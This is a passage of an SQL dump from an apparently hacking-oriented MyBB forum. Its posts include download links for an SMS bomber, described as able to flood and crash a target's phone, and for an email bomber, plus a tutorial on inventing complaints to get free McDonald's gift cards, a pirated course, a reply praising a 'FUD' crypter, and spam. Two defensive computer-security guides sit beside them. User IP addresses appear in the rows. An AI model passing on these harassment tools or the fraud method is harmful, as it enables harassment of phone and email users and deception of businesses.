Told ?? [New Release] [Huge Profits]', '0', '4', 'Triple H', '1342395879', '[align=center][img]http://i.imgur.com/DVKYN.png[/img][/align] [color=#00BFFF]In AdSense Secrets 5 You Will Discover....[/color] [color=#FFFFFF]? How to Claim Your Share of The Multi-Billion Dollar AdSense Pie ? Ways to Build An Adsense Ready Website Without a Domain or Hosting ? Secrets to Tweaking and Optimizing your Ads for Maximum Revenue ? How to use Google\'s Custom Search engine to Catch Fickle Visitors ? Special Code to Influence Your Ads with Section Targeting and Keywords[/color] [align=center][img]http://i.imgur.com/QR0Qf.png[/img][/align] [color=#FFFFFF]? How to Understand your AdSense Stats, Channels and Split Testing ? That you can use Google Analytics to Optimize your AdSense Revenue ? Smart Pricing and What it Means for your Income ? Whether AdSense for RSS Feeds and Mobile are right for You ? How to Generate Quality Long Term Traffic for Consistent AdSense Profits ? Which Social Media Sites You Can Leverage Into AdSense Traffic ? The Biggest Mistakes AdSense Publishers make and how to AVOID them. ? What TO DO if your AdSense Account gets closed ? What TO DO if you\'re not getting the results you want. ? What TO DO BEFORE you apply to Google ? The Wordpress Theme That Makes AdSense Optimization Easy[/color] [quote] Sales Page: http://www.adsense-secrets.com [/quote] [color=#32CD32]Download:[/color] [quote] http://9670ba69.linkbucks.com [/quote]', '41.174.7.183', '699271095', '1', '0', '0', '0', '1', 'f7c1052a3d4cf19c4ff8dc974bb3cca5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('135', '19', '54', '16', 'RE: [tut]How to SE your school teachers', '0', '1', 't3h jok3r', '1342397669', 'Great tutorial. I wonder how I missed this tutorial out.', '41.174.7.77', '699270989', '1', '0', '1', '1342472725', '1', '88f149dde38461c6e7f013e846f15781', '0', '1342472725'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('136', '53', '0', '19', '[Junk]Adding Beauty by Painting', '0', '18', 'MartyFogerlie', '1342429044', 'With the growing demand for houses and apartments in Kerala, builders are taking a lot of care to provide the best service to the customers. Interior designing and painting has gained a lot of importance. The [url=http://www.jairajbuilders.com/]apartments in Kerala[/url] have entered a new era.   There are different types of paints and finishes. Each has its own advantages and disadvantages. Latex paint is easier to clean up but it is not suitable in humid rooms like bathrooms.  The other advantages of latex paints are that they are usually cheaper, fade resistant, easier clean up, environment friendly, dries fast, no special thinners or solvents required, less dust pick up and requires less stirring less often. It is generally preferred for walls, ceilings and primed woodwork. Oil based paints are stain resistant and adhere well to the walls even in humid regions. Their other advantages include better flow properties, allow for a smoother finish, slower set up time. But it is difficult to remove it from the brushes, floor or the skin and requires turpentine. It is preferred for wood trim, cabinets and metal surfaces. The different types of finish determine how light gets reflected off the walls and how easier it is to remove stains and scuff marks after the walls are painted.   Different ways of lighting the apartment can affect the way the paint looks. The paint may look very beautiful under the fluorescent light but might not be so attractive in the natural light. Bold shades and unusual colors can transform completely the way an apartment looks.', '115.249.239.138', '1945759626', '0', '0', '0', '0', '1', '0849a2672de187558a133d3c3beb1748', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('137', '53', '136', '19', '[Junk]Adding Beauty by Painting', '0', '1', 't3h jok3r', '1342468645', 'This thread has been junked.', '41.151.151.55', '697800503', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('138', '54', '0', '16', '[tut]How to SE McDonald', '0', '9', 'p420', '1342469413', 'You can either call them up(for the more pro SE\'er) OR You can go to http://www.mcdonalds.com (for the more beginner SE) In this guide we are going to go with the beginner SE so we are going to go to the website 1: Go to http://www.mcdonalds.com and find the Contact Us page at the bottom on the page. 2: Come up with a really good story on how shitty your food looked or tasted...(remember the more you say you spent the higher your free Gift card will be, it does vary) 3: Wait about 2 days for them to contact you back 4: They will send you a message saying they are truely sorry for your unsatisfactorial visit with there mcdonalds and that they are immediatly doing what they can to help you.. 5: That\'s it your done wait till you get your gift card in the mail for free food. No need to use fake info... and its as easy as that', '41.151.151.55', '697800503', '0', '0', '0', '0', '1', 'c8d802eeb7deb867b7b2f3ab9f672533', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('139', '55', '0', '12', '[tut] SMS Bomber', '0', '9', 'p420', '1342469677', 'Here is a SMS Bomber that is very simple and easy to use, it is also for Android phones [color=#FFD700][u]ONLY[/u][/color]. But do not be confused it can send to any type of phone :) It is possible to overload your targets phone and crash it with too many messages. ;) [u][color=#FFD700]Features[/color][/u] - Unlimit number of text - Flood multiple contacts - Cancel button - No delay or periodically send - Remember last config - Easily select contacts - Counter to make sms differently - Add counter to (press menu/Counter) into each text [color=#FF0000]Step 1:[/color] Get on your Android phone and go to your browser and type this in the URL. http://code.google.com/p/sms-bomber/downloads/list [color=#FF0000]Step 2:[/color] Click on the first box with the [color=#32CD32]green[/color] download arrow. You can download any version but I suggest choosing the first one, it is the most updated. [color=#FF0000]Step 3:[/color] Once done downloading just run the program and enter the targets info and your message. [size=large][b]Here is the VS. It is not harmful to you so do not worry.[/b][/size] [i]File Info[/i] Report date: 2012-07-10 06:48:58 (GMT 1) File name: [b]smsbomber-v1-1-apk[/b] File size: 140344 bytes MD5 Hash: cc747206f53615f95f7a35ad0d898972 SHA1 Hash: 18258461db5c78232420a7e038dba3c9cbe0cd15 Detection rate: [color=#FF0000]3[/color] on 14 ([color=#FF0000]21%)[/color] Status: INFECTED Detections Asquared - [color=#FF0000]AndroidOS.HackTool.SMSBomber!IK[/color] Avast - AVG - Avira - BitDefender - ClamAV - Comodo - DrWeb - Fprot - IkarusT3 - [color=#FF0000]AndroidOS.HackTool.SMSBomber[/color] Panda - STOPZilla - TrendMicro - [color=#FF0000]AndroidOS_SMSBOMBER.CDE[/color] VBA32 - [i]Scan report generated by[/i] NoVirusThanks.org That\'s it! Very simple to use and very straight forward! Cheers.', '41.151.151.55', '697800503', '0', '0', '0', '0', '1', '0b3793ab3b97162788a0745ece3a804b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('140', '56', '0', '15', 'Tubeonia [ Best Youtube Bot ]', '0', '5', 'Timmy', '1342470071', '[align=center]Tubenoia is the cheapest, most advanced and most complete YouTube marketing software on the web. Easy Getting started is not only simple, effortless and stress-free, it’s also very straightforward. Our application can be geared up in a matter of seconds, working its magic with a click of a button. After installation, which is complete in a few simple steps, you’re ready to go. Fast The best part about using our application is the speed in which the results come flooding in. In just a matter of days, your channel can receive a much higher volume of visitors, subscribers and comments than you could ever achieve alone. Effective The success of our application is thanks to the many features it brings to your YouTube channel, whether you are a director, producer, actor, comedian, marketer or simply promoting your organisation, product or service. To make an impact, you should choose an application which brings results, not just once, but continuously, to enable your channel to grow. Here is some of the variety of features Tubenoia offers. We have picked our most favorited features. - Rank Checker - Video Scrapers - From top lists - From keywords - From channels - “About to go viral” - Fully customizable settings - Multithreaded - Account Checker - User Scrapers - From comments - From friends - From subscribers - From any page - Filters - User filters - Filter by: friend count, subscriber count, video upload count - Video filters - Filter by: views, favorites, ratings and comments - Mass Downloader - 240, 360, 480, 720 and 1080 support - Tools - Comment Obfuscator - Video Tools - Give likes, dislikes, favorites, friend requests, subscriptions, etc. - Comment Rater - Proxy Scraper - Account & Proxy Binder - Avatar Uploader [b]Virus scan[/b] http://www.virustotal.com/file-scan/report.html?id=3d8b89eb8481a6ad68455796b0d4f9af34e18a238533c341c74e8f2e1055b31e-1319755185 [b]Download[/b] http://www.multiupload.com/5120SXTAMH[/align]', '41.151.151.55', '697800503', '1', '0', '0', '0', '1', '35967c340a338b80a3127765b7703478', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('141', '57', '0', '18', 'Hackyer\'s Email Bomber V1.0', '0', '12', 'jonas83', '1342471305', 'This is the first program i have made so dont take this piss lol Its easy to use so im not going to do a tutorial, i have tested it and it works fine enjoy. [align=center] [img]http://img401.imageshack.us/img401/1812/bomberb.png[/img] [i]File Info[/i] Report date: 2010-09-16 13:40:41 (GMT 1) File name: [b]hackyer-s-email-bomber-exe[/b] File size: 612864 bytes MD5 Hash: a0b920dc9229d16a8614ac8d4e20f064 SHA1 Hash: 84290df51b839e356addbd66ab9dd9b851242232 Detection rate: [color=#32CD32]0[/color] on 16 ([color=#32CD32]0%[/color]) Status: [color=#32CD32]CLEAN [/color] Detections a-squared - Avast - AVG - Avira AntiVir - BitDefender - ClamAV - Comodo - Dr.Web - F-PROT6 - Ikarus T3 - Kaspersky - NOD32 - Panda - TrendMicro - VBA32 - VirusBuster - Scan report generated by NoVirusThanks.org[/align] DOWNLOAD: [quote] http://www.multiupload.com/RS_VORRKHE43B [/quote]', '41.151.151.55', '697800503', '0', '0', '0', '0', '1', '127051ddfb39bc3ae0f1d9265b0c1599', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('142', '33', '88', '20', 'RE: Heavens Crypter FUD', '0', '4', 'Triple H', '1342471521', 'Thanks for replacing the link. Works perfectly.', '41.151.151.55', '697800503', '1', '0', '0', '0', '1', 'fd0407cbd3f5ce8edbcf390ccf912c99', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('143', '28', '82', '3', 'RE: Buttons updated.', '0', '1', 't3h jok3r', '1343926039', 'New CSS buttons coming into play today.', '173.245.64.174', '-1376436050', '1', '0', '0', '0', '1', 'e26be029f62d7bd28067729616d9c753', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('144', '58', '0', '42', 'Miley Cyrus gets swatted', '0', '1', 't3h jok3r', '1343945931', 'Miley Cyrus\' Los Angeles home was swarmed by police, fire and rescue squads responding to a report of a possible home invasion, but the pop star was apparently the victim of a \"swatting\" prank. Law enforcement officials said a 911 call came in Wednesday at 6:50 p.m. PT, stating a possible home invasion with possible shots fired at Cyrus\' home. \"We responded to a call of a kidnapping in progress, one person shot, at an address on Amanda Drive,\" North Hollywood police said. Lol read more: http://gma.yahoo.com/miley-cyrus-california-home-swarmed-police-possible-hoax-112155400--abc-news-celebrities.html', '41.174.16.25', '699273241', '1', '0', '0', '0', '1', 'd009739d014bfafd9af92140fe1127d8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('145', '59', '0', '42', '13 year old visits jail for hacking', '0', '1', 't3h jok3r', '1343946002', 'http://www.youtube.com/watch?v=nHKDeBBbd-U&feature=related Poor kid goes to jail for blackhat hacking.', '41.174.16.25', '699273241', '1', '0', '0', '0', '1', '2bbb608081b4ec84f483ee8678efbec3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('146', '60', '0', '25', '[guide] Basic Computer Security', '0', '1', 't3h jok3r', '1343946768', 'This guide was written to provide a foundation of security on your system. It will not guarantee you 100% safety, but it will reduce the risks of infection greatly. I will update this guide as I find more relevant information. [color=green][u][b]Table of Contents:[/b][/u][/color] [list][*]1. Basics to being secure on the web [*]2. Antivirus [*]3. Antispyware [*]4. Firewall [*]5. Prevention [*]6. List of Security Software [*]7. External Links & Information [/list] [color=green][u]1. [b]Basics to being secure on the web[/b][/u][/color] First of all, no security in the world can keep you completely safe from every single unique malware created. The number one way to stay safe is having [b]safe surfing habits[/b]. Remember, preventing a virus from ever winding its way onto your PC in the first place is the best way to keep safe. Safe surfing habits means you don\'t just Google something and click on the first result that comes up. It would be good to get in a habit of checking websites you browse to. You can easily do that with a quick Google search of \" [website URL] good or bad?\". The way I do it is checking on McAfee\'s Siteadvisor website: [url=http://www.siteadvisor.com]Siteadvisor[/url]. Do a quick search on there, read some of the reviews, and make your decision on if you should go onto that website or not. [color=green][u]2. [b]Antivirus[/b][/u][/color] **Note: Do NOT install and run more than one antivirus per PC. Having more than one antivirus does not secure your PC any more than having one does. All it causes are conflicts on your PC. There are plenty of good antiviruses out there. Though this is biased in my opinion, I have researched a bit on several vendors and come to a few conclusions. I have seperated the comparison into two categories: freeware and paid software. Do note, paid software isn\'t necessarily better than freeware. [list][*]Starting off with commercial products, I believe the top two competitors would be [b]Kaspersky Internet Security[/b] and [b]ESET Smart Security[/b]. I personally have only used Kaspersky, ESET, McAfee, and Symantec commercial products. [list][*][b]Kaspersky[/b] has been noted for its high detection capabilities, and it is not a memory hogger. It comes with several features, including an antivirus and antispyware engine, a firewall, spam filter, parental controls, and a few other tools. [u]February 2009 AV Comparatives Results[/u] Award received: Advanced + Number of False Positives: Few On demand Scanning Speed: Average Total Percentage (Detection Rate): 97.1% Screenshot: [spoiler][img]http://www.sizlopedia.com/wp-content/uploads/kaspersky2009.jpg[/img][/spoiler] [*][b]ESET[/b] is also known for high detection rates. In addition, it is recorded as the most lightweight antivirus in its market. ESET has a sleek interface and includes features such as an antivirus and antispyware engine, a firewall, a spam filter, and a few other tools. [u]February 2009 AV Comparatives Results[/u] Award received: Advanced + Number of False Positives: Few On demand Scanning Speed: Average Total Percentage (Detection Rate): 97.6% Screenshot: [spoiler][img]http://www.eset.eu/buxus/images/essv4gui.jpg[/img][/list][/spoiler] [*]Next are the freeware programs. I personally have only tried AVG, avast! and Avira Antivir. I recommend either [b]Avira Antivir[/b] or [b]avast! Antivirus[/b]. [list][*][b]Avira Antivir[/b] is rated number one in detection rates for 2008/2009. Based on tests by AVcomparative, Avira detected over 99% of the threats that were set on the system. The only thing I can criticize is Avira\'s updating system is a bit on the slow side. Features of Avira (free version) include an antivirus and antispyware engine, with a couple of other features. [u]February 2009 AV Comparatives Results[/u] Award received: Advanced Number of False Positives: Many On demand Scanning Speed: Average Total Percentage (Detection Rate): 99.7% *Note: The reason Avira Antivir did not receive Advanced + is because of the high number of false positives. Download link for the Avira Antivir Personal Edition: [url=http://dw.com.com/redir?edId=3&siteId=4&oId=3000-2239_4-10322935&ontId=2239_4&spi=e6e462f80757049a31116cdaf2c22284&lop=link<ype=dl_dlnow&pid=11024276&mfgId=6290072&merId=6290072&pguid=z3fN7AoPjAMAAEFs3kwAAAF7&destUrl=http%3A%2F%2Fdownload.cnet.com%2F3001-2239_4-10322935.html%3Fspi%3De6e462f80757049a31116cdaf2c22284%26part%3Ddl-10322935]Download Avira[/url] Screenshot: [spoiler][img]http://www.hwdot.com/images/Avira%20AntiVir%20PersonalEdition%20Classic%20-%20Free%20Antivirus%20Freeware%202.jpg[/img][/spoiler] [*][b]avast! Antivirus[/b] is a free antivirus that comes with an antivirus, antispyware, and anti-rootkit engine, along with online protection. It too has a high detection rate. [u]February 2009 AV Comparatives Results[/u] Award received: Advanced Number of False Positives: Many On demand Scanning Speed: Fast Total Percentage (Detection Rate): 98.2% Download link: [url=http://www.avast.com/eng/avast_4_home.html]avast! Antivirus Home Edition[/url] Screenshot: [spoiler][img]http://i.d.com.com/i/dl/media/dlimage/55/88/1/55881_large.jpeg[/img][/spoiler] [/list][/list] [color=green][u]3. [b]Antispyware[/b][/u][/color] If you are using a commercial antivirus product, chances are you already have an antispyware engine bundled with it so skip this section. However, if you are using a free antivirus, here is a list of a few antispyware programs you may be interested in. [list][*][b]Malwarebytes\' Antimalware[/b] A new antispyware program, this small program is recommended for several reasons. One, it has great detection rates. Two, it uses minimal system resources. Three, fast updates, quick scans; it also produces a log after each scan. Malwarebytes\' Antimalware comes with an extra tool, FileAssassin. This is used to securely delete locked files, or persistent malware files. Download link: [url=http://malwarebytes.org/]Malwarebytes\' Antimalware[/url] Screenshot: [spoiler][img]http://www.zen22142.zen.co.uk/Media/malwarebytes.gif[/img][/spoiler] [*][b]Ad-Aware[/b] Though Ad-Aware isn\'t as recommended by security experts anymore, it is still good to have as a backup scanner. Download link: [url=http://www.lavasoft.com/products/ad_aware_free.php]Ad-Aware Free[/url] [*][i]AVG Antispyware was removed from this list due to the recent decision to not have AVG Antispyware as a stand alone product. It is now included in the AVG Internet Security Suite[/i] [/list] [color=green][u]4. [b]Firewall[/b][/u][/color] **Note: Just like an antivirus, do not run more than one firewall per PC. It causes conflicts on your PC. Again, if you are using a commercial security suite, a firewall should already be included. Firewalls are vital to a computer\'s security. They help monitor incoming and outcoming connections, etc. There are many free firewalls out there, and the few that I recommend are [b]ZoneAlarm[/b] and [b]Comodo Firewall[/b]. [list][*][b]ZoneAlarm[/b] is for a less computer savvy user. It has the basic features of a firewall, with antivirus monitoring included. Download link: [url=http://www.zonealarm.com/security/en-us/zonealarm-pc-security-free-firewall.htm]ZoneAlarm Free[/url] Screenshot: [spoiler][img]http://www.webtechgeek.com/NewYorkPics/ZoneAlarm-Free.jpg[/img][/spoiler] [*][b]Comodo Firewall[/b] comes with an antivirus engine. It is a bit more advanced than ZoneAlarm. It also has basic firewall features, along with the bonus feature of an antivirus. I wouldn\'t rely solely on Comodo\'s antivirus though; you should still have an independent antivirus. Download link: [url=http://personalfirewall.comodo.com/download_firewall.html]Comodo Firewall[/url] Screenshot: [spoiler][img]http://pcwin.com/media/images/screen/73890-comodo_firewall_pro.gif[/img][/spoiler] [*][b]Online Armor[/b] is a well recognized firewall. It is also considered a HIPS program, and is very useful in detecting malware. Download link: [url=www.tallemu.com]Online Armor[/url] Screenshot: [spoiler][img]http://www.softpedia.com/screenshots/Online-Armor-Personal-Firewall-AV-plus_3.png[/img][/spoiler] [/list] [color=green][u]5. [b]Prevention[/b][/u][/color] This may be one of the most important parts in this whole guide. Prevention is the key. A couple of things I recommend to finalize your computer\'s security: [list][*][b]MVPS Hosts file[/b] A HOSTS file is basically a file that blocks websites. For this reason, it is very useful. MVPS Hosts can be used to block malicious websites. This means when you go on one of the malicious websites, your browser should show a \"Page load error\" instead of loading the page. Instructions and download link is here: [url=www.mvps.org/winhelp2002/hosts.htm]MVPS Hosts[/url] [*][b]SpywareBlaster[/b] SpywareBlaster is a program that creates a list of restricted sites, and it blocks cookies in Mozilla FireFox and Internet Explorer. Download link and more information here: [url=http://www.javacoolsoftware.com/sbdownload_setup.html]SpywareBlaster[/url] [*][b]WinPatrol[/b] WinPatrol is a handy tool that monitors any unwanted changes to your system, including changes in startup programs, HOSTS file, etc. Download link and information: [url=http://www.winpatrol.com/]WinPatrol[/url] [/list] These last couple of programs can be useful too, but I won\'t go into details about them: SandBoxie - a sandbox for running programs in CCleaner - clearing out temp files, etc [color=green][u]6. [b]List of Security Software[/b][/u][/color] This may be incomplete, so please reply or give me a PM if there is something to be added. This is meant as a reference list if ever needed. [b]Antivirus Security Vendors:[/b] [list][*]McAfee (McAfee products) [*]Kaspersky (Kaspersky products) [*]Alwil (avast! products) [*]Symantec (Norton products) [*]Sophos (Sophos products) [*]ESET (NOD32 and ESET Smart Security products) [*]AVG (AVG products ; AVG Antispyware was bought by AVG, originally named Ewido) [*]BitDefender (BitDefender products) [*]Panda (Panda products + new Cloud Antivirus) [*]F-Secure (F-Secure products + Conflicker worm removal tool) [*]Kingsoft (Kingsoft products) [*]Microsoft (Microsoft Live OneCare ; to be discontinued soon) [*]Norman [*]PC Tools [*]Rising [*]ZoneAlarm (ZoneAlarm products; specialty is in firewalls)[/list] [b]Antispyware Vendors:[/b] [list][*]Webroot (SpySweeper) [*]Lavasoft (Ad-Aware) [*]Sunbelt (Counterspy) [*]Prevx (Prevx CSI) [*]Microsoft (Windows Defender)[/list] [b]Firewall:[/b] [list][*]ZoneAlarm [*]Comodo [*]Sunbelt (Kerio Firewall) [*]Agnitum (Outpost Firewall) [*]Tiny (Tiny Firewall) [*]Online Armor [/list] [b]HIPS (Host Intrusion Prevention System):[/b] [list][*]PC Tools (ThreatFire) [*]Crawler (Spyware Terminator) [*]DefenseWall[/list] [b]Anti-Trojan:[/b] [list][*]Trojan Hunter [*]a-squared[/list] [b]Anti-Keylogger\"[/b] [list][*]KeyScrambler[/list] [b]Rootkit Removers:[/b] [list][*]IceSword [*]F-Secure BlackLight [*]GMER [*]AVG Anti-Rootkit[/list] [color=green][u]7. [b]External Links & Information[/b][/u][/color] [url=http://www.spywarewarrior.com/rogue_anti-spyware.htm]SWW Rogue Antimalware Link[/url] [url=http://temerc.blogspot.com/]Malware Advisor[/url] [url=http://www.siteadvisor.com]SiteAdvisor (for checking websites)[/url]', '41.174.16.25', '699273241', '1', '0', '1', '1343947060', '1', '0550697ef4832e023b2c7afa45aaa5d2', '0', '1343947060'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('147', '61', '0', '23', '[Tutorial] Prevention of Infection', '0', '8', 'spacefish36', '1343947441', '[align=center][size=medium][b][color=#00BFFF]Section 1[/color][/b][/size][/align] Welcome to White Hat Helper’s tutorial on prevention of infection. Within this tutorial, you will learn about various strategies often implemented to prevent harmful software from damaging your system. I’ll cover the following points: Importance of Infection Prevention, Potential Infectious Software Recognition, Infectious Software Treatment, Prevention of Infection Tools, and Prevention of Infection General Information. [b][u]Table of Contents[/b][/u] 1.0 Introduction to Infection Prevention 2.0 Importance of Infection Prevention 3.0 Potential Infectious Software Recognition 4.0 Preventing Infection 4.1 Online Anonymity 5.0 Infectious Software Treatment 5.1 Antivirus Quarantine 5.2 HiJackThis 6.0 Prevention of Infection Tools 6.1 HiJackThis 6.2 Application Isolation Software 6.2.1 Sandboxie 6.3 VPN Software 6.3.1 Hotspot Shield 6.3.2 Tor 6.3.3 Loki 6.4 Online Proxies 6.4.1 HideMyAss 6.5 Antiviruses 6.5.1 ESET NOD32 6.5.2 AVG 6.5.3 Avast 6.5.4 BitDefender 6.5.5 Kaspersky 6.6 Firewalls 6.6.1 Microsoft Windows Firewall 7.0 Conclusion Learning how to prevent your system from being infected is one of the most important characteristics of a successful hacker. Whether you’re a White Hat Hacker or a Black Hat Hacker, being able to lock out malicious programs is absolutely vital to ensure that the life and efficiency of your setup is always at its peak. Being malware free and alert of potential tribulations is essential to any hacker’s computing competence. [u]2.0 Importance of Infection Prevention[/u] To any serious hacker, the efficiency of their computer is one of the most important things. Having a slow, ineffective machine that’s jam-packed with viruses and spyware can be extremely frustrating and terribly inefficient. You want a machine that can be trusted; something that will rarely (if ever) crash. Infection prevention is the art of optimising your system with the best software possible to protect you from malicious programs. It’s also the art of adapting yourself to being alert of suspicious software and threats which may, in tern, cause your system to function poorly. [u]3.0 Potential Infectious Software Recognition[/u] Having the ability to recognise software that might be potentially malicious is a key part in maintaining your system and keeping it virus free. There are a few different things that you should be on the lookout for when downloading [i]any[/i] software. Before downloading software, it’s important to stop and analyse it. There are a few things that should be taken into perspective: the source (website/torrent/colleague), its creator (the developer), and the feedback (reviews/write-ups/comments). [i]The Source[/i] When downloading anything, whether it is something as minor as a new font for your Photoshop arsenal, or something as major as a web browser or game, taking note of the download location is vital. If you download something that’s from a torrent or a poorly constructed website, you’re at a far greater risk of getting infected with malicious software disguised as a legitimate application. Torrents are one of the biggest highways for malware distribution, and it’s highly advisable to avoid them at all costs. Should you download a program from an official website which is well-known (example: Microsoft.com), you have virtually, a zero percent chance of being infected. This is probably considered as commonsense, but some programs can be difficult to deduce whether or not their source is, in fact, legitimate. This is where you have to look at other factors such as the creator and the feedback. [i]The Creator[/i] The creator of an application or document is often one of the most important elements used to decide whether a download is safe or not. If you’re contemplating downloading something from a torrent and have very little information on the creator, it’s advised not to download the file. Likewise, if you’re downloading something from a poorly constructed website, with few regular viewers, it’s also advisable to avoid such downloads. Knowing the creator of the program is a trusted developer, it makes your decision a whole lot easier. For example, downloading a program from a Hack Forums user with over thirty + Reputation generally means the file will be clean. Once again, this is common knowledge, but it’s important to note that members with one or two posts and zero + Reputation would be considered as a bad source. It’s highly advisable to not download from members who don’t have a good reputation. A hacking forum is a prime target for script kiddies who want to infect people with their software. When situations get more difficult, and lie borderline between potentially dangerous and clean, you’ve got to assume they’re dangerous. This is where you should look at other information such as the feedback the creator’s received. [i]The Feedback[/i] Feedback can be information such as comments, ratings, and reputations. If a torrent has good comments, and a quality rating, then it can often be trusted as a legitimate download. Similarly, as mentioned above, a Hack Forums member with over ten + Reputation is far more likely to be trustworthy, rather than a new member with one post. When these three elements are analysed and you’ve corroborated correctly, you’ll normally have a good ideas as to whether it’s a trustworthy program or not. If you’re still unsure about a program’s authenticity, I’d advise you not to download it. [u]4.0 Preventing Infection[/u] Preventing infection is critical for the maintenance of your machine. Not only that, but it makes your overall computing experience much more gratifying. One of the most efficient ways to remain infection free, is to stay as anonymous as possible when online. [u]4.1 Online Anonymity[/u] Online anonymity is that act of being unknown to third-party users when surfing the Internet. Whether it be social networking services, forums, or signups, it’s strongly advised to remain as secret as possible. This can be done in a number of ways, though the most obvious is providing incorrect personal information. If being targeted by any Black Hat Hacker, most people are at a great risk of being exploited because they have private information show publically online. To ‘dox’ someone means to find out as much personal information as possible. In the hacking world, this form of discovery is used to seek out an appropriate target. Obviously, not being able to be ‘doxed’ is extremely important to remain anonymous. Being secure and unknown is the best way to operate online if you’re serious about security. Having personal details such as your name, age, phone number, address, e-mail address available to public figures who, to your knowledge, could be anyone, is not a safe way to operate. When signing up for forums, services, and other online aptitudes, it’s advised to provide as much incorrect information as possible to remain anonymous.[hr] [align=center][size=medium][b][color=#00BFFF]Section 2[/color][/b][/size][/align] [u]5.0 Infectious Software Treatment[/u] Falling slave to malware infection is normal, and it’s very difficult to completely protect yourself. The fact is, sooner or later, you’re highly likely to become infected. Obviously prevention is the key, but seeking the right treatment for an infection is vital. There is a lot of software which aims at protection and prevention, yet sadly there isn’t a lot when it comes to cure. Many antivirus programs have the ability to quarantine suspicious files, which is imperative for quick removal. Another method of seeking out problems is implementing the ‘HiJackThis’ service. [u]4.1 Antivirus Quarantine[/u] Most antivirus softwares have the ability to [i]quarantine[/i] suspicious files. Having antivirus software is, possibly, the most mandatory tool to any hacker. Good quality antivirus programs have capability to detect malicious programs when you come in contact with them. This is rather effective and helps prevent much potential destruction. [u]4.2 HiJackThis[/u] HiJackThis is an online service based upon gathering logs of your system’s functionality. A HiJackThis log is a depiction of your system’s output and, when analysed correctly, can be an extremely useful tool to seek out the problem, and in tern, patch the problem. I’ll go into more detail on the HiJackThis service later on. [u]5.0 Preventing Infection[/u] Preventing infection is critical for the maintenance of your machine. Not only that, but it makes your overall computing experience much more gratifying. [u]6.0 Prevention of Infection Tools[/u] This section will justify some of the essential tools often used to prevent infection. Having competent software is extremely important to the survival of your system. One cannot prevent being infected without the aid of a few basic tools, which is why I’ve detailed some of the basic software regularly used to prevent your system from being compromised. [u]6.1 HiJackThis[/u] As mentioned above, the HiJackThis resource is one of the most important services freely available online to diagnose infected systems. Analysing HiJackThis logs, does however take a lot of time and if incorrectly scrutinized, can cause much harm to a computer system. This is why, it’s advised that you seek the help of a trained HiJackThis analyst before attempting anything yourself. [b]Availability[/b] [url=http://hijackthis.com]The HiJackThis Website[/url] [u]6.2 Application Isolation Software[/u] Application isolation software is software used to safely test suspicious applications in the safety of an isolated provision. An example might be, you’ve just downloaded a file that your friend said was a really cool game. You know this person often tries to infect people with various exploits such as Remote Administration Tools, so you don’t want to take any chances. The best thing to do in this scenario would be to use application isolation software. This’ll allow you to see if it really is a game, or if it has other intentions. [u]6.2.1 Sandboxie[/u] Though there is other application isolation software available, Sandboxie is regarded as one of the more efficient tools. It’s designed to provide a safe environment for you to test any 